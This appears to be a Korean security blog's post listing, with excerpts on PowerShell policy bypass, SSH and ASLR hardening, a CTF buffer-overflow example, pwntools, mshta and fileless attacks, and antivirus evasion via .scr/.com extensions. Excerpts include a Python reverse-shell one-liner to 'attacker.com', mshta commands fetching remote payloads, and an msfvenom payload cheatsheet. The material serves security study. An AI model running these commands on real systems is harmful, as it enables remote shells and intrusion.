본문 바로가기
728x90
반응형

시스템 보안14

시스템 보안 - Powershell 실행 정책 우회하는 15가지 방법 https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ 15 Ways to Bypass the PowerShell Execution PolicyBy default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on .. 2024. 4. 24.
시스템 보안 - SSH root 원격 접속 차단 정책 설정(/etc/ssh/sshd_config) SSH root 원격 접속 차단 정책 설정(/etc/ssh/sshd_config) 기존 "PermitRootLogin yes"를 "PermitRootLogin no"로 수정한다. # vim /etc/ssh/sshd_config # Authentication PermitRootLogin no 설정이 완료하였다면 서비스를 재시작한다. service ssh restart 정책을 설정하기 이전(PermitRootLogin yes) root@kali:~/Desktop# ssh root@localhost root@localhost's password: Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 The programs inc.. 2023. 11. 10.
시스템 보안 - 리눅스 커널 ASLR 메모리 보호 기법 설정(randomize_va_space) ASLR(Address Space Layout Randomization)이란? 메모리 공격을 방어하기 위해 주소 공간 배치를 난수 화하는 기법으로 실행 시마다 메모리 주소를 변경시켜 악성코드에 의한 특정주소 호출을 방지한다. 리눅스 ASLR 적용 (/proc/sys/kernel/randomize_va_space 수정) echo 0 > /proc/sys/kernel/randomize_va_space # ASLR 미설정 echo 1 > /proc/sys/kernel/randomize_va_space # ASLR 부분설정(heap만 미설정) echo 2 > /proc/sys/kernel/randomize_va_space # ASLR 모두설정(stack, heap, library 등) sysctl 명령어로 리눅.. 2023. 11. 9.
시스템 보안 - EXE 파일 PE(Portable Executable) 구조 분석하기 PE(Portable Executable)이란? Windows 운영체제에서 실행되는 이진 파일 형식을 의미한다. 이 파일 형식은 Windows 운영체제에서 실행 가능한 프로그램, DLL, 드라이버 등에 포함된다. 리눅스에도 PE와 비슷한 파일 형식이 있으며 ELF(Executable and Linkable Format)라고 부른다. PE 파일 종류 1) 실행 계열 : EXE, SCR 2) 라이브러리 계열 : DLL, OCX, CPL, DRV 3) 드라이브 계열 : SYS, VXD 4) 오브젝트 파일 계열 : OBJ 사용 목적 프로그램을 사용하기 위해서는 메모리 공간에 적재가 되어야 한다. 이때 PE에는 메모리 공간의 어디 주소에 적재가 될지와 실행에 필요한 라이브러리 같은 정보들이 포함되어 있다. PE .. 2023. 10. 7.
CTF - 윈도우 스택 버퍼 오버플로우 예제(bof.c) bof.c #include #include #include void shell_code(){ printf("WELCOME SHELLCODE!"); system("cmd"); } int main(int argc, char **argv){ char buffer[12]; memset(buffer, 0x00, sizeof(buffer)); if(argc != 2){ printf("Usage : ./bof.exe data\n"); exit(-1); } strcpy(buffer, argv[1]); printf("sizeof %d \n", sizeof(argv[1])); printf("strlen %d \n", strlen(argv[1])); return 0; } compile gcc -m32 bof.c -o bof.. 2023. 9. 18.
시스템 보안 - pwntools pwntools는 리눅스 환경에서 실행 프로그램의 익스플로잇을 작성하도록 도움을 주는 파이썬 라이브러리이다. CTF에서도 유용하게 사용될 수 있다. pip 설치 명령어 python3 -m pip install --upgrade pwntools 사용 예제 >>> conn = remote('ftp.ubuntu.com',21) >>> conn.recvline() # doctest: +ELLIPSIS b'220 ...' >>> conn.send(b'USER anonymous\r\n') >>> conn.recvuntil(b' ', drop=True) b'331' >>> conn.recvline() b'Please specify the password.\r\n' >>> conn.close() nc(NetCat), .. 2023. 3. 25.
시스템 보안 - 윈도우 MSHTA(Microsoft HTML Application) 공격 command-line mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")")) mshta.exe http://127.0.0.1:4444/payload.hta mshta.exe \\127.0.0.1\folder\payload.hta payload.hta (SCT payloads) 결과 HTA(HTML Application) 보는 것처럼 윈도우에 기본적으로 설치된 mshta.exe(Microsoft HTML Application)는 마치 웹 브라우저처럼 외부에 있는 웹 페이지를 요청하는 기능을 가지고 있다. 여기서 문제점은 여기에 내장된 브라우저가 인터넷 익스플로러 기반인지 ActiveXObject.. 2023. 2. 7.
시스템 보안 - 실행 파일이 없는 우회 기법(파일리스 공격) "파일리스"라는 용어는 컴퓨터의 메모리에만 있는 백도어와 같은 위협이 파일에 제공되지 않음을 시사합니다. 파일리스 기법은 공격이 탐지되지 않거나 추적이 힘들다. 기본적으로 악성코드가 디스크에 파일 형태로 존재하지 않아 스캔 대상이 되지가 않는다. 2016년도부터 파워쉘이 활용이 된 파일리스 공격이 증가세를 보였다. 예제 1) LNK 파일을 이용한 파워셸 원 라이너 실행 화면에 clickme라는 이름의 문서 파일처럼 보이는 파일은 사실 LNK 파일이다. 파일의 속성을 살펴보면 파워셸이 실행되도록 등록돼 있는 것을 볼 수 있는데, 에디터를 이용해 파일의 내용을 자세히 살펴보면, 파워셸 원 라이너라는 것을 알 수 있다. [그림 7] clickme 문서로 보이는 LNK 파일 예제 2) 엑셀을 이용한 파워셸 원 .. 2023. 2. 7.
시스템 보안 - 파이썬 리버스 쉘 스크립트 export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' 대부분의 유닉스 계열의 OS(리눅스, 맥os)에는 python2는 설치가 되어있는 경우가 많으니 별도의 설치 없이 명령어만으로 사용 가능하다. 출처: https://gtfobins.github.io/gtfobins/python/#reverse-shell python | GTFOBins Run socat file:`tt.. 2023. 1. 25.
시스템 보안 - 메타스플로잇 msfvenom 리버스 쉘 제작 명령어 출처: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes n… infinitelogins.com 윈도우 msfvenom -p windows/meterp.. 2023. 1. 24.
시스템 보안 - EXE 확장자를 대체하는 확장자들(SCR, COM, BAT) .exe 형태의 실행 프로그램 말고도 .scr과 .com으로도 동일한 실행 결과를 가져올 수 있다. .scr .scr은 화면 보호기 즉 Windows Screensaver를 의미하지만 마찬가지로 포맷 종류가 실행 파일 형태라서 .exe 파일의 확장자를 .scr로 바꿔만 줘도 똑같이 실행이 잘 된다. 이를 악용하여 백신 프로그램이 .exe를 우선적으로 검사한다는 것을 우회하기 위해서 .scr을 대신 사용하는 멀웨어도 존재한다. .com .com은 DOS Command File으로 .scr과 마찬가지로 실행 파일 포맷을 가지고 있어서 .exe 파일을 .com으로 바꿔줘도 동일하게 실행된다. 원래는 DOS 환경에서 자주 사용되던 확장자이었다고 한다. 우리가 자주 사용하는 인터넷 도메인 ".com"과는 다른 것.. 2022. 10. 7.
시스템 보안 - Jscript Jscript는 ECMA스크립트 표준에 기반을 둔 스크립팅 언어이기 때문에 Javascript과 문법이 똑같다. 게다가 둘 다 브라우저에서 실행시키는 스크립트 언어인 것도 동일하다. (Jscript: 마이크로소프트 개발, Javascript: 넷스케이프 개발) 하지만 둘이 같다고 할 수는 없는 게 Jscript는 시스템 내에 외부 프로그램을 실행시킬 수 있는 WScript(윈도우 스크립트 호스트)를 추가한 언어라는 점. 예시로 Jscript는 인터넷 익스플로러에서 쓰이는데(지금은 사용 중단했지만) 우리가 은행 사이트에 들어가게 되면 컴퓨터에 깔려있는 보안 프로그램과 상호작용을 하게 되는데 이게 WScript 덕분에 가능한 일이다. 가끔 윈도우에서 .js 파일을 확인하면 아래처럼 뭔가 아이콘도 있고 한데 .. 2022. 10. 6.
728x90
반응형